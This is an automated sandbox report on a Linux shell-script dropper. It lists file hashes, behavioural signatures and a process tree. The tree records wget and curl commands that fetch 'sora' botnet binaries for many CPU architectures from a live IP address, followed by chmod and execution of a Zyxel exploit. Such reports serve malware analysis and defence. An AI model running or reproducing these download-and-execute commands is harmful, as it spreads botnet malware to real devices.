Analysis
-
max time kernel
31s -
max time network
29s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
18/10/2024, 03:03
Static task
static1
Behavioral task
behavioral1
Sample
ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh
-
Size
2KB
-
MD5
eb7a4e59f642cd5475876f6ef1a09d3a
-
SHA1
9232db0ebfe888067cc85a32b786a7ce41be0a6f
-
SHA256
ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670
-
SHA512
9393df90cc409e4f6ee6a2fc7df960123823ca22c25f01ae4e2ab094f74f71f0565925aa0384a5e84f4b15792d89317af71b1f223fa7fdd340b4404f9a25c6b8
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 14 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 748 chmod 772 chmod 835 chmod 725 chmod 735 chmod 760 chmod 841 chmod 754 chmod 803 chmod 822 chmod 742 chmod 788 chmod 847 chmod 856 chmod -
Executes dropped EXE 14 IoCs
ioc pid Process /tmp/robben 726 robben /tmp/robben 736 robben /tmp/robben 743 robben /tmp/robben 749 robben /tmp/robben 755 robben /tmp/robben 761 robben /tmp/robben 773 robben /tmp/robben 789 robben /tmp/robben 805 robben /tmp/robben 824 robben /tmp/robben 836 robben /tmp/robben 842 robben /tmp/robben 848 robben /tmp/robben 857 robben -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 728 wget 732 curl 734 cat -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/robben ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh
Processes
-
/tmp/ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh/tmp/ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh1⤵
- Writes file to tmp directory
PID:700 -
/usr/bin/wgetwget http://93.123.85.141/bins/sora.x862⤵PID:704
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.x862⤵
- Reads runtime system information
PID:713
-
-
/bin/catcat sora.x862⤵PID:723
-
-
/bin/chmodchmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-697a0a9baabf4f0db369deff28d514ca-systemd-timedated.service-lugVr62⤵
- File and Directory Permissions Modification
PID:725
-
-
/tmp/robben./robben zyxel.exploit2⤵
- Executes dropped EXE
PID:726
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.mips2⤵
- System Network Configuration Discovery
PID:728
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.mips2⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:732
-
-
/bin/catcat sora.mips2⤵
- System Network Configuration Discovery
PID:734
-
-
/bin/chmodchmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-697a0a9baabf4f0db369deff28d514ca-systemd-timedated.service-lugVr62⤵
- File and Directory Permissions Modification
PID:735
-
-
/tmp/robben./robben zyxel.exploit2⤵
- Executes dropped EXE
PID:736
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.x86_642⤵PID:738
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.x86_642⤵
- Reads runtime system information
PID:740
-
-
/bin/catcat sora.x86_642⤵PID:741
-
-
/bin/chmodchmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-697a0a9baabf4f0db369deff28d514ca-systemd-timedated.service-lugVr62⤵
- File and Directory Permissions Modification
PID:742
-
-
/tmp/robben./robben zyxel.exploit2⤵
- Executes dropped EXE
PID:743
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.i4682⤵PID:745
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.i4682⤵
- Reads runtime system information
PID:746
-
-
/bin/catcat sora.i4682⤵PID:747
-
-
/bin/chmodchmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-697a0a9baabf4f0db369deff28d514ca-systemd-timedated.service-lugVr62⤵
- File and Directory Permissions Modification
PID:748
-
-
/tmp/robben./robben zyxel.exploit2⤵
- Executes dropped EXE
PID:749
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.i6862⤵PID:751
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.i6862⤵
- Reads runtime system information
PID:752
-
-
/bin/catcat sora.i6862⤵PID:753
-
-
/bin/chmodchmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-697a0a9baabf4f0db369deff28d514ca-systemd-timedated.service-lugVr62⤵
- File and Directory Permissions Modification
PID:754
-
-
/tmp/robben./robben zyxel.exploit2⤵
- Executes dropped EXE
PID:755
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.mpsl2⤵PID:757
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.mpsl2⤵
- Reads runtime system information
PID:758
-
-
/bin/catcat sora.mpsl2⤵PID:759
-
-
/bin/chmodchmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-697a0a9baabf4f0db369deff28d514ca-systemd-timedated.service-lugVr62⤵
- File and Directory Permissions Modification
PID:760
-
-
/tmp/robben./robben zyxel.exploit2⤵
- Executes dropped EXE
PID:761
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm42⤵PID:763
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm42⤵
- Reads runtime system information
PID:764
-
-
/bin/catcat sora.arm42⤵PID:770
-
-
/bin/chmodchmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-697a0a9baabf4f0db369deff28d514ca-systemd-timedated.service-lugVr62⤵
- File and Directory Permissions Modification
PID:772
-
-
/tmp/robben./robben zyxel.exploit2⤵
- Executes dropped EXE
PID:773
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm52⤵PID:776
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm52⤵
- Reads runtime system information
PID:780
-
-
/bin/catcat sora.arm52⤵PID:785
-
-
/bin/chmodchmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-697a0a9baabf4f0db369deff28d514ca-systemd-timedated.service-lugVr62⤵
- File and Directory Permissions Modification
PID:788
-
-
/tmp/robben./robben zyxel.exploit2⤵
- Executes dropped EXE
PID:789
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm62⤵PID:791
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm62⤵
- Reads runtime system information
PID:795
-
-
/bin/catcat sora.arm62⤵PID:801
-
-
/bin/chmodchmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-697a0a9baabf4f0db369deff28d514ca-systemd-timedated.service-lugVr62⤵
- File and Directory Permissions Modification
PID:803
-
-
/tmp/robben./robben zyxel.exploit2⤵
- Executes dropped EXE
PID:805
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm72⤵PID:807
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm72⤵
- Reads runtime system information
PID:811
-
-
/bin/catcat sora.arm72⤵PID:821
-
-
/bin/chmodchmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-697a0a9baabf4f0db369deff28d514ca-systemd-timedated.service-lugVr62⤵
- File and Directory Permissions Modification
PID:822
-
-
/tmp/robben./robben zyxel.exploit2⤵
- Executes dropped EXE
PID:824
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.ppc2⤵PID:827
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.ppc2⤵
- Reads runtime system information
PID:831
-
-
/bin/catcat sora.ppc2⤵PID:834
-
-
/bin/chmodchmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-697a0a9baabf4f0db369deff28d514ca-systemd-timedated.service-lugVr62⤵
- File and Directory Permissions Modification
PID:835
-
-
/tmp/robben./robben zyxel.exploit2⤵
- Executes dropped EXE
PID:836
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.ppc440fp2⤵PID:838
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.ppc440fp2⤵
- Reads runtime system information
PID:839
-
-
/bin/catcat sora.ppc440fp2⤵PID:840
-
-
/bin/chmodchmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-697a0a9baabf4f0db369deff28d514ca-systemd-timedated.service-lugVr62⤵
- File and Directory Permissions Modification
PID:841
-
-
/tmp/robben./robben zyxel.exploit2⤵
- Executes dropped EXE
PID:842
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.m68k2⤵PID:844
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.m68k2⤵
- Reads runtime system information
PID:845
-
-
/bin/catcat sora.m68k2⤵PID:846
-
-
/bin/chmodchmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-697a0a9baabf4f0db369deff28d514ca-systemd-timedated.service-lugVr62⤵
- File and Directory Permissions Modification
PID:847
-
-
/tmp/robben./robben zyxel.exploit2⤵
- Executes dropped EXE
PID:848
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.sh42⤵PID:850
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.sh42⤵
- Reads runtime system information
PID:851
-
-
/bin/catcat sora.sh42⤵PID:855
-
-
/bin/chmodchmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben2⤵
- File and Directory Permissions Modification
PID:856
-
-
/tmp/robben./robben zyxel.exploit2⤵
- Executes dropped EXE
PID:857
-